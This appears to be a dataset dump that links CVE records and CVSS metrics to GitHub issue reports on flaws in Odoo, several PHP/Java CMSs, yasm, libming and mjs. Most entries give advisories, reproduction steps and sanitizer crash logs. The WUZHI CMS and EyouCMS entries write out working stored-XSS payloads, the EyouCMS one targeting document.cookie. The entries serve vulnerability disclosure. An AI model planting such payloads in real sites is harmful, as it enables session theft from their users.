cve_id
stringlengths
13
16
cve_published
stringlengths
23
23
cve_descriptions
stringlengths
48
2.08k
cve_metrics
dict
cve_references
listlengths
1
138
cve_configurations
listlengths
1
39
url
stringlengths
37
77
cve_tags
listlengths
1
4
domain
stringclasses
1 value
issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
88.6k
issue_title
stringlengths
3
335
issue_comments_url
stringlengths
56
81
issue_comments_count
int64
0
146
issue_created_at
stringlengths
20
20
issue_updated_at
stringlengths
20
20
issue_html_url
stringlengths
37
62
issue_github_id
int64
104M
2.09B
issue_number
int64
1
122k
CVE-2021-44547
2023-04-25T19:15:09.843
A sandboxing issue in Odoo Community 15.0 and Odoo Enterprise 15.0 allows authenticated administrators to executed arbitrary code, leading to privilege escalation.
{ "cvssMetricV2": null, "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.7, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", ...
[ { "source": "security@odoo.com", "tags": [ "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://github.com/odoo/odoo/issues/107696" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:community:*:*:*", "matchCriteriaId": "C5B912BD-1FB4-418A-9CE3-FBE0903D70BA", "versionEndExcluding": null, "versionEndIncluding": "15.0", "versionStartExclud...
https://github.com/odoo/odoo/issues/107696
[ "Issue Tracking", "Patch", "Vendor Advisory" ]
github.com
[ "odoo", "odoo" ]
# Security Advisory - [CVE-2021-44547](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44547) **Affects**: Odoo 15.0 (Community and Enterprise Editions) **CVE ID**: [CVE-2021-44547](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44547) **Component**: Core **Credits**: Stephane Debauche A sandboxing i...
[SEC] CVE-2021-44547 - A sandboxing issue in Odoo Community 15.0 and...
https://api.github.com/repos/odoo/odoo/issues/107696/comments
0
2022-12-10T23:00:48Z
2022-12-10T23:00:49Z
https://github.com/odoo/odoo/issues/107696
1,489,087,347
107,696
CVE-2021-44775
2023-04-25T19:15:09.903
Cross-site scripting (XSS) issue in Website app of Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier, allows remote attackers to inject arbitrary web script in the browser of a victim, by posting crafted contents.
{ "cvssMetricV2": null, "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", ...
[ { "source": "security@odoo.com", "tags": [ "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://github.com/odoo/odoo/issues/107691" }, { "source": "security@odoo.com", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5399" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:community:*:*:*", "matchCriteriaId": "C5B912BD-1FB4-418A-9CE3-FBE0903D70BA", "versionEndExcluding": null, "versionEndIncluding": "15.0", "versionStartExclud...
https://github.com/odoo/odoo/issues/107691
[ "Issue Tracking", "Patch", "Vendor Advisory" ]
github.com
[ "odoo", "odoo" ]
# Security Advisory - [CVE-2021-44775](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44775) **Affects**: Odoo 15.0 and earlier (Community and Enterprise Editions) **CVE ID**: [CVE-2021-44775](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44775) **Component**: Website **Credits**: Holger Brunn (Ther...
[SEC] CVE-2021-44775 - Cross-site scripting (XSS) issue in Website a...
https://api.github.com/repos/odoo/odoo/issues/107691/comments
0
2022-12-10T23:00:39Z
2022-12-10T23:00:40Z
https://github.com/odoo/odoo/issues/107691
1,489,087,157
107,691
CVE-2021-45071
2023-04-25T19:15:09.963
Cross-site scripting (XSS) issue Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier, allows remote attackers to inject arbitrary web script in the browser of a victim, via crafted uploaded file names.
{ "cvssMetricV2": null, "cvssMetricV30": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", ...
[ { "source": "security@odoo.com", "tags": [ "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://github.com/odoo/odoo/issues/107697" }, { "source": "security@odoo.com", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5399" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:community:*:*:*", "matchCriteriaId": "C5B912BD-1FB4-418A-9CE3-FBE0903D70BA", "versionEndExcluding": null, "versionEndIncluding": "15.0", "versionStartExclud...
https://github.com/odoo/odoo/issues/107697
[ "Issue Tracking", "Patch", "Vendor Advisory" ]
github.com
[ "odoo", "odoo" ]
# Security Advisory - [CVE-2021-45071](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45071) **Affects**: Odoo 15.0 and earlier (Community and Enterprise Editions) **CVE ID**: [CVE-2021-45071](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45071) **Component**: Core **Credits**: Lauri Vakkala, Anıl Y...
[SEC] CVE-2021-45071 - Cross-site scripting (XSS) issue Odoo Communi...
https://api.github.com/repos/odoo/odoo/issues/107697/comments
0
2022-12-10T23:00:50Z
2022-12-10T23:00:51Z
https://github.com/odoo/odoo/issues/107697
1,489,087,376
107,697
CVE-2021-45111
2023-04-25T19:15:10.020
Improper access control in Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier allows remote authenticated users to trigger the creation of demonstration data, including user accounts with known credentials.
{ "cvssMetricV2": null, "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", ...
[ { "source": "security@odoo.com", "tags": [ "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://github.com/odoo/odoo/issues/107683" }, { "source": "security@odoo.com", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5399" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:community:*:*:*", "matchCriteriaId": "C5B912BD-1FB4-418A-9CE3-FBE0903D70BA", "versionEndExcluding": null, "versionEndIncluding": "15.0", "versionStartExclud...
https://github.com/odoo/odoo/issues/107683
[ "Issue Tracking", "Patch", "Vendor Advisory" ]
github.com
[ "odoo", "odoo" ]
# Security Advisory - [CVE-2021-45111](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45111) **Affects**: Odoo 15.0 and earlier (Community and Enterprise Editions) **CVE ID**: [CVE-2021-45111](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45111) **Component**: Core **Credits**: Nils Hamerlinck (Trob...
[SEC] CVE-2021-45111 - Improper access control in Odoo Community 15....
https://api.github.com/repos/odoo/odoo/issues/107683/comments
0
2022-12-10T23:00:25Z
2022-12-10T23:00:26Z
https://github.com/odoo/odoo/issues/107683
1,489,086,907
107,683
CVE-2023-30349
2023-04-27T14:15:09.320
JFinal CMS v5.1.0 was discovered to contain a remote code execution (RCE) vulnerability via the ActionEnter function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/jflyfox/jfinal_cms/issues/54" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jflyfox:jfinal_cms:5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "9B33E946-BD15-449C-B736-013773A64DF6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
https://github.com/jflyfox/jfinal_cms/issues/54
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "jflyfox", "jfinal_cms" ]
jfinal_cms version:5.1.0 JDK version : jdk-8u351 The ActionEnter class is instantiated in the index method of the /ueditor route ![image](https://user-images.githubusercontent.com/52622597/218020013-817ef70b-822c-4926-8145-87a6d0615e63.png) The ConfigManager class is instantiated in the constructor of the Act...
jfinal CMS v5.1.0 has a command execution vulnerability exists
https://api.github.com/repos/jflyfox/jfinal_cms/issues/54/comments
5
2023-02-10T07:03:59Z
2024-01-07T08:18:27Z
https://github.com/jflyfox/jfinal_cms/issues/54
1,579,105,443
54
CVE-2023-30338
2023-04-27T15:15:13.787
Multiple stored cross-site scripting (XSS) vulnerabilities in Emlog Pro v2.0.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Article Title or Article Summary parameters.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://github.com/emlog/emlog/issues/229" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:emlog:emlog:2.0.3:*:*:*:pro:*:*:*", "matchCriteriaId": "5B872763-766F-478B-BA9C-97A85DC372F5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
https://github.com/emlog/emlog/issues/229
[ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ]
github.com
[ "emlog", "emlog" ]
**Version(latest version)** emlog_pro_2.0.3 **Actual behavior** XSS vulnerabilities **Steps to reproduce the behavior** 1.There is a stored xss in the article writing. The article body(文章正文) and article summary(文章摘要) has the vulnerability. 在写文章功能点,文章正文以及文章摘要处存在存储型xss ![image](https://user-images.githubus...
XSS vulnerabilities in pro2.0.3
https://api.github.com/repos/emlog/emlog/issues/229/comments
2
2023-03-31T02:58:46Z
2023-10-27T04:26:32Z
https://github.com/emlog/emlog/issues/229
1,648,589,849
229
CVE-2023-29950
2023-04-27T20:15:40.207
swfrender v0.9.2 was discovered to contain a heap buffer overflow in the function enumerateUsedIDs_fillstyle at modules/swftools.c
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/198" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:0.9.2:*:*:*:*:*:*:*", "matchCriteriaId": "B6149BA0-2082-45B7-9B43-CAC2F1768770", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcl...
https://github.com/matthiaskramm/swftools/issues/198
[ "Exploit", "Vendor Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
# 1.heap-buffer-overflow ## env ubuntu20.04 gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1) swfrender - part of swftools 0.9.2 ## sample [id7_heap-buffer-overflow.zip](https://github.com/keepinggg/poc/blob/main/poc_of_swfrender/id7_heap-buffer-overflow.zip) ## crash ``` ./swfrender id7_heap-buffer-o...
bug report -- swfrender
https://api.github.com/repos/swftools/swftools/issues/198/comments
0
2023-03-23T06:44:18Z
2023-03-23T06:44:18Z
https://github.com/swftools/swftools/issues/198
1,636,946,205
198
CVE-2023-30123
2023-04-28T14:15:11.047
wuzhicms v4.1.0 is vulnerable to Cross Site Scripting (XSS) in the Member Center, Account Settings.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/wuzhicms/wuzhicms/issues/205#issue-1635153937" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wuzhicms:wuzhicms:4.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "2B76E69A-B2F3-4359-A7C0-046CEE2FAEEB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcl...
https://github.com/wuzhicms/wuzhicms/issues/205#issue-1635153937
[ "Exploit", "Issue Tracking" ]
github.com
[ "wuzhicms", "wuzhicms" ]
There is a Stored-XSS vulnerability in WUZHI CMS 4.1.0 Member Center - Account Settings POC The payload is `"><details/open/ontoggle=alert('/xss/')>` ![image](https://user-images.githubusercontent.com/47726460/226822882-f7f27e35-be6d-4653-8f26-8d34be262fc0.png) ![image](https://user-images.githubuserconten...
There is a Stored-XSS vulnerability in WUZHI CMS 4.1.0
https://api.github.com/repos/wuzhicms/wuzhicms/issues/205/comments
0
2023-03-22T06:44:23Z
2023-03-22T06:44:23Z
https://github.com/wuzhicms/wuzhicms/issues/205
1,635,153,937
205
CVE-2023-30125
2023-04-28T14:15:11.083
EyouCms V1.6.1-UTF8-sp1 is vulnerable to Cross Site Scripting (XSS).
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/40" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.1-utf8-sp1:*:*:*:*:*:*:*", "matchCriteriaId": "91E07F04-0ABB-44F1-AAA5-E4E8E7B3DE92", "versionEndExcluding": null, "versionEndIncluding": null, "versionSt...
https://github.com/weng-xianhu/eyoucms/issues/40
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "weng-xianhu", "eyoucms" ]
Version: V1.6.1-UTF8-sp1 ![image](https://user-images.githubusercontent.com/47726460/227478224-441945d3-d648-4a98-b416-db5ce54559b7.png) 1. Go to the background --> Advertising management -->Add new ads 2. Then fill in the payload " <style onload=alert(document.cookie) />"in the ad content. ![image](https://us...
There is a xss causes XSS to steal sensitive information of logged-in users
https://api.github.com/repos/weng-xianhu/eyoucms/issues/40/comments
0
2023-03-24T09:24:19Z
2024-03-22T06:48:55Z
https://github.com/weng-xianhu/eyoucms/issues/40
1,639,023,869
40
CVE-2023-31972
2023-05-09T13:15:18.503
yasm v1.3.0 was discovered to contain a use after free via the function pp_getline at /nasm/nasm-pp.c. Note: Multiple third parties dispute this as a bug and not a vulnerability according to the YASM security policy.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/yasm/yasm/issues/209" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tortall:yasm:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "1453CF78-5025-49BF-A1A6-C62F948B5735", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding...
https://github.com/yasm/yasm/issues/209
[ "Exploit", "Issue Tracking" ]
github.com
[ "yasm", "yasm" ]
I found a heap-use-after-free in yasm. Please confirm. Thanks! Test Environment Ubuntu 20.04, 64 bit yasm (version: v1.3.0 ;master) How to trigger Compile the program with AddressSanitizer Run command $ ./yasm -w -W -M $PoC Details ASAN report $./yasm -w -W -M $PoC ``` yasm: warning: unrecogni...
yasm heap use-after-free bug
https://api.github.com/repos/yasm/yasm/issues/209/comments
1
2023-03-01T02:17:35Z
2023-05-10T05:20:07Z
https://github.com/yasm/yasm/issues/209
1,604,108,494
209
CVE-2023-31974
2023-05-09T13:15:18.550
yasm v1.3.0 was discovered to contain a use after free via the function error at /nasm/nasm-pp.c. Note: Multiple third parties dispute this as a bug and not a vulnerability according to the YASM security policy.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/yasm/yasm/issues/208" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tortall:yasm:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "1453CF78-5025-49BF-A1A6-C62F948B5735", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding...
https://github.com/yasm/yasm/issues/208
[ "Exploit", "Issue Tracking" ]
github.com
[ "yasm", "yasm" ]
I found a heap-use-after-free in yasm. Please confirm. Thanks! Test Environment Ubuntu 20.04, 64 bit yasm (version: v1.3.0 ;master) How to trigger Compile the program with AddressSanitizer Run command $ ./yasm -w -W -M $PoC Details ASAN report $./yasm -w -W -M $PoC ``` yasm: warning: unrecogni...
yasm heap use-after-free bug
https://api.github.com/repos/yasm/yasm/issues/208/comments
1
2023-03-01T02:08:44Z
2023-05-10T05:20:11Z
https://github.com/yasm/yasm/issues/208
1,604,101,306
208
CVE-2023-31975
2023-05-09T13:15:18.590
yasm v1.3.0 was discovered to contain a memory leak via the function yasm_intnum_copy at /libyasm/intnum.c. Note: Multiple third parties dispute this as a bug and not a vulnerability according to the YASM security policy.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 3.3, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityI...
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2023/06/20/6" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwal...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yasm_project:yasm:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "AD6556F7-3880-452A-ABA9-1A8A14BA41F3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcl...
https://github.com/yasm/yasm/issues/210
[ "Exploit", "Issue Tracking" ]
github.com
[ "yasm", "yasm" ]
I found a memory leak bug in yasm. Please confirm. Thanks! ### Test Environment Ubuntu 20.04, 64 bit yasm (version: v1.3.0 ;master) ### How to trigger Compile the program with AddressSanitizer Run command $ touch u $ ./yasm -ium u ### Details ASAN report $./yasm -ium u ``` yasm: file name ...
yasm memory leak
https://api.github.com/repos/yasm/yasm/issues/210/comments
5
2023-03-01T02:27:11Z
2024-03-22T11:43:38Z
https://github.com/yasm/yasm/issues/210
1,604,119,944
210
CVE-2023-31973
2023-05-09T14:15:13.737
yasm v1.3.0 was discovered to contain a use after free via the function expand_mmac_params at /nasm/nasm-pp.c. Note: Multiple third parties dispute this as a bug and not a vulnerability according to the YASM security policy.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/yasm/yasm/issues/207" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tortall:yasm:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "1453CF78-5025-49BF-A1A6-C62F948B5735", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding...
https://github.com/yasm/yasm/issues/207
[ "Exploit", "Issue Tracking" ]
github.com
[ "yasm", "yasm" ]
I found a heap-use-after-free in yasm. Please confirm. Thanks! Test Environment Ubuntu 20.04, 64 bit yasm (version: v1.3.0 ;master) How to trigger Compile the program with AddressSanitizer Run command $ ./yasm -w -W -M $PoC Details ASAN report $./yasm -w -W -M $PoC ``` yasm: warning: unrecognized ...
yasm heap use-after-free bug
https://api.github.com/repos/yasm/yasm/issues/207/comments
1
2023-03-01T02:03:35Z
2023-05-10T05:20:08Z
https://github.com/yasm/yasm/issues/207
1,604,096,378
207
CVE-2023-31976
2023-05-09T14:15:13.780
libming v0.4.8 was discovered to contain a stack buffer overflow via the function makeswf_preprocess at /util/makeswf_utils.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/265" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
https://github.com/libming/libming/issues/265
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
When the program input contains the option of "-D" or "-o" , the program will cause stack buffer overflow error. Test Environment Ubuntu 20.04, 64 bit libming (master ; commit [04aee52](https://github.com/libming/libming/commit/04aee52363688426eab74f5d6180c149654a6473)) How to trigger Compile the progra...
makeswf stack buffer overflow
https://api.github.com/repos/libming/libming/issues/265/comments
0
2023-02-28T06:17:08Z
2023-02-28T06:17:08Z
https://github.com/libming/libming/issues/265
1,602,439,311
265
CVE-2021-31240
2023-05-09T16:15:14.147
An issue found in libming v.0.4.8 allows a local attacker to execute arbitrary code via the parseSWF_IMPORTASSETS function in the parser.c file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrit...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/218" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
https://github.com/libming/libming/issues/218
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
Hi, I found a memory leak problem. version: 0.4.8 command: swftophp poc poc: [parser.c_2556.zip](https://github.com/libming/libming/files/6276040/parser.c_2556.zip) Here is the report from ASAN: ``` `header indicates a filesize of 761 but filesize is 550 <?php $m = new SWFMovie(8); ming_setscale(1.0); $m...
Memory leaks in parseSWF_IMPORTASSETS
https://api.github.com/repos/libming/libming/issues/218/comments
0
2021-04-08T04:46:50Z
2021-04-08T04:46:50Z
https://github.com/libming/libming/issues/218
853,054,686
218
CVE-2023-30083
2023-05-09T16:15:14.373
Buffer Overflow vulnerability found in Libming swftophp v.0.4.8 allows a local attacker to cause a denial of service via the newVar_N in util/decompile.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/266" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
https://github.com/libming/libming/issues/266
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
Heap buffer overflow in the latest version of libming at function newVar_N in util/decompile.c:654. ## Environment Ubuntu 18.04, 64 bit libming 0.4.8 ## Steps to reproduce 1. download file ``` wget https://github.com/libming/libming/archive/refs/tags/ming-0_4_8.tar.gz tar -zxvf ming-0_4_8.tar.gz ``` 2. co...
Heap buffer overflow in newVar_N() at decompile.c:654
https://api.github.com/repos/libming/libming/issues/266/comments
0
2023-03-21T06:45:54Z
2023-03-21T06:45:54Z
https://github.com/libming/libming/issues/266
1,633,318,454
266
CVE-2023-30084
2023-05-09T16:15:14.423
An issue found in libming swftophp v.0.4.8 allows a local attacker to cause a denial of service via the stackVal function in util/decompile.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/268" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
https://github.com/libming/libming/issues/268
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
Invalid memory read in the latest version of libming at function stackVal in util/decompile.c:1238. ## Environment Ubuntu 18.04, 64 bit libming 0.4.8 ## Steps to reproduce 1. download file ``` wget https://github.com/libming/libming/archive/refs/tags/ming-0_4_8.tar.gz tar -zxvf ming-0_4_8.tar.gz ``` 2. co...
Invalid memory read in stackVal() at decompile.c:1238
https://api.github.com/repos/libming/libming/issues/268/comments
0
2023-03-21T06:53:51Z
2023-03-21T06:53:51Z
https://github.com/libming/libming/issues/268
1,633,325,057
268
CVE-2023-30085
2023-05-09T16:15:14.470
Buffer Overflow vulnerability found in Libming swftophp v.0.4.8 allows a local attacker to cause a denial of service via the cws2fws function in util/decompile.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/267" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
https://github.com/libming/libming/issues/267
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
Allocation size overflow in the latest version of libming at function cws2fws in util/main.c:111. ## Environment Ubuntu 18.04, 64 bit libming 0.4.8 ## Steps to reproduce 1. download file ``` wget https://github.com/libming/libming/archive/refs/tags/ming-0_4_8.tar.gz tar -zxvf ming-0_4_8.tar.gz ``` 2. comp...
Allocation size overflow in cws2fws() at main.c:111
https://api.github.com/repos/libming/libming/issues/267/comments
0
2023-03-21T06:50:17Z
2023-03-21T06:50:17Z
https://github.com/libming/libming/issues/267
1,633,322,109
267
CVE-2023-30087
2023-05-09T16:15:14.547
Buffer Overflow vulnerability found in Cesanta MJS v.1.26 allows a local attacker to cause a denial of service via the mjs_mk_string function in mjs.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/cesanta/mjs/issues/244" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:1.26:*:*:*:*:*:*:*", "matchCriteriaId": "25C97820-C80A-41CE-B510-F292D2AF665E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding":...
https://github.com/cesanta/mjs/issues/244
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "cesanta", "mjs" ]
